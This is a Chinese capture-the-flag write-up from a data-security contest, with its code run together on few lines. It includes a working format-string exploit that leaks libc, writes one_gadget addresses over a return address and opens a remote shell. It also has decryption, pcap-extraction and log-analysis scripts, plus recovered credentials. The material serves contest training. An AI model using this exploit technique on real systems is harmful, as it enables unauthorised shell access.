数据安全题
pb
from pwn import *context.arch = 'amd64'context.log_level = 'debug'context.terminal = ['tmux', 'sp' ,'-h']libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')io = remote('106.15.53.199','32829')payload = "%11$p%13$p"io.sendlineafter("How to do?n", payload)leak = eval(io.recv(14))info(hex(leak))libc_start_main = leak - 240info(hex(libc_start_main))libc_base = libc_start_main - libc.sym['__libc_start_main']info(hex(libc_base))'''0x45226 execve("/bin/sh", rsp+0x30, environ)constraints:rax == NULL0x4527a execve("/bin/sh", rsp+0x30, environ)constraints:[rsp+0x30] == NULL0xf03a4 execve("/bin/sh", rsp+0x50, environ)constraints:[rsp+0x50] == NULL0xf1247 execve("/bin/sh", rsp+0x70, environ)constraints:[rsp+0x70] == NULL'''one_gadget_list = [0x45226, 0x4527a, 0xf03a4, 0xf1247]one_gadget = libc_base + one_gadget_list[3]info(hex(one_gadget))raw_input()stack_leak_addr = eval(io.recv(14))info(hex(stack_leak_addr))ret_addr = stack_leak_addr - 256 + 32info(hex(ret_addr))write_in = ret_addr & 0xffffnum_len = len(str(write_in))payload = "%{}c%13$hn".format(write_in-num_len + 5)io.sendlineafter("How to do?n", payload)payload = "%{}c%39$hn".format((one_gadget & 0xffff))io.sendlineafter("How to do?n", payload)payload = "%{}c%13$hn".format(write_in - num_len + 7)io.sendlineafter("How to do?n", payload)payload = "%{}c%39$hn".format(((one_gadget >> 16) & 0xffff))io.sendlineafter("How to do?n", payload)io.sendlineafter("How to do?n", 'a'*100)io.interactive()
re_ds001
import base64import rewith open('en_file_data.enf', 'rb') as f:data = list(f.read())for i in range(len(data)):data[i] = ((data[i] << 5) & 0xff) | (data[i] >> 3)data = bytes(data).decode()b64 = re.findall(r'[A-Za-z0-9+/]*={0,2}', data)res = b''for x in b64:if x == '':continuex = base64.b64decode(x)res += xwith open('res', 'wb') as f:f.write(res)res_m = [x.split(b' ') for x in res.split(b'n')]print(res_m[12-1][2-1]) # 第12行第2列736463199528108971
from arc4 import ARC4with open('en_file_data.enf2', 'rb') as f:data = f.read().split(b'rn')k1 = b"6A1D4E2a2276Y7JL" # from debuggingk2 = b"276Y7JB6A1D4E2A2" # from debuggingres = b''for x in data:l = list(x)for i in range(len(l)):l[i] ^= k2[i%len(k2)]rc4 = ARC4(k1)ans = rc4.encrypt(bytes(l))res += answith open('res', 'wb') as f:f.write(res)res_m = [x.split(b' ') for x in res.split(b'n')]print(res_m[8-1][2-1]) # 第8行第2列855981200427146647
数据分析题
数据分析1
题目1
<?phpecho md5('ftp+admin+admin123');flag为:458e8dbe703531b99e3381853b3134ef
题目2
<?phpecho md5('101+key');flag为:717c0890a66bcf9524e87fdccb7d2bf4
题目3
写脚本导出ftp流中传输的图片,看到100张图片的尺寸都是400*4,可以知道这些图片需要纵向拼接。
import pysharkfrom PIL import Imageimport numpy as npdef get_png(): # 导出图片cap = pyshark.FileCapture('./catcat.pcapng', display_filter="ftp-data")n = 1for packet in cap:p = packet['TCP'].get_field('payload')if p.startswith("89:50:4e:47"):png = bytes([int(x, 16) for x in p.split(':')])with open(f'in/{n}.png', 'wb') as f:f.write(png)n += 1return ndef tog_png(fn): # 拼接图片img = np.array(Image.open('in/1.png'))height, width, color = img.shaperes_img = np.zeros((height*100, width, color), dtype=int)for x in range(1, 101):img = np.array(Image.open(f"in/{x}.png"))# img = np.array(Image.open(f"output/res_{x}.png"))height, width, color = img.shapefor j in range(height):res_img[j+(x-1)*height] = img[j]Image.fromarray(np.uint8(res_img)).save(fn)returndef arnold(im_file, a, b, fn):img = np.array(Image.open(im_file))height, width, color = img.shaperes_img = np.zeros((height, width, color), dtype=int)for j in range(height):for i in range(width):res_img[((a*b+1)*j-a*i) % height, (-b*j+i) % width] = img[j, i]Image.fromarray(np.uint8(res_img)).save(fn)returnif __name__ == '__main__':assert get_png() == 100+1a = 0x6f6c53b = 0x729etog_png('res0.png')arnold('res0.png', a, b, 'res1.png')
import base64def get_flag():# stegsolve导出lsb数据lsb = "R1kzRE1RWldHRTNET04yQ0dNWlRNTlJUR00zREdNWlJHWVpER05CVEhFWlRLTVpRR00yREdNSlRIRVpUQ05SV0dZWVRNTlJUR1laVEtNWlhHTTNER09CVEdZWlRNTlJXR000VEdPSlRIQVpUQU1aV0dZWlRNTkJYSVE9PT09PT0="b64 = base64.b64decode(lsb)b32 = base64.b32decode(b64)flag = bytes.fromhex(b32.decode())print(flag)flag{3f3c1b49504191faf6576866f99806cd}
数据分析2
题目1
table_log=[……]table_groups=[……]table_users=[……]table_api=[……]for i in range(0,len(table_log)):log=table_log[i]user_id=log[1]method=log[2].split(" ")[5].replace('"',"")api_path=log[2].split(" ")[6]group_id=table_users[user_id-1][-1]methods=table_groups[group_id-1][1]#print(methods)api_paths=table_groups[group_id-1][2]tmp_api_paths=[]for j in api_paths.split(','):tmp_api_paths.append(table_api[int(j)-1][1])api_paths=str(tmp_api_paths)#print(api_paths)if method not in methods or api_path not in api_paths:for k in table_api:if k[1] in api_path:print(str(user_id)+"_"+str(group_id)+"_"+str(k[0])+"_"+str(i+1))
<?phpecho md5('129_3_92_3223,137_7_16_4436,423_10_26_2667,469_4_3_3917');flag为:8634fe5ad186b44f9a7e51ac0595a768
数据分析3
题目1
<?phpecho md5('admin:admin@QWEzxc');flag为:95e1da8517497ee29e716a2835375eeb
题目2
题目3
<?phpecho md5('webuser:1q2w3e4r5t6y');flag为:a18b8e2d1a8ee267599b04be62f0a26a
数据分析5
题目2
原文始发于微信公众号(山石网科安全技术研究院):第二届数据安全大赛暨首届“数信杯”东部赛区writeup
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论